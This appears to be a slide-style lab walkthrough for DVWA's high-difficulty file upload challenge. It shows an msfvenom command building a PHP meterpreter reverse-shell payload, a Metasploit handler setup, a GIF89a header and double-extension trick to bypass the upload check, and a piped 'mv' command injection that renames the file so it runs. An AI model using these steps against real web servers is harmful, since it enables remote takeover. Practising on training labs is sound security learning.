File Upload
Walkthrough on DVWA
HIGH
Difficulty
@mmar
1
� Chain Multiple
Vulnerabilities
(File upload + Command
Injection
2
� Step- 1
Go to DVWA security settings and set the difficulty to high
3
� Step- 2
Create a msfvenom payload on your kali machine
msfvenom ‐p php/meterpreter/reverse_tcp LHOST=127.0.0.1
LPORT=4444 ‐f raw >exploit.php
4
� Step- 3
Now run Metasploit and start a multi‐handler to listen to PHP
reverse sessions.
>use exploit/multi/handler set payload
>php/meterpreter/reverse_tcp
5
� Step- 4
Now upload the file. The file will be not be uploaded. In
Medium Difficulty, the server checks for file content type and
if it is not a jpeg image, it does not upload it.
6
� Step- 5
In high difficulty, the server checks for the file type as well. We
can bypass it by appending content type header in the file
itself. So, add GIF89a; on top of your exploit file. Rename it to
exploit.php.jpeg and upload it. The file will be uploaded.
7
� Step- 6
Now we need to exploit some other vulnerability to make the
file work. If we do have command injection. Use the following
command to rename the file.
| mv "/usr/share/dvwa/hackable/uploads/exploit.php.jpeg"
"/usr/share/dvwa/hackable/uploads/exploit.php"
8
� Step- 7
Now browse to the uploaded file. We will get the reverse shell.
9
�THANKS
10
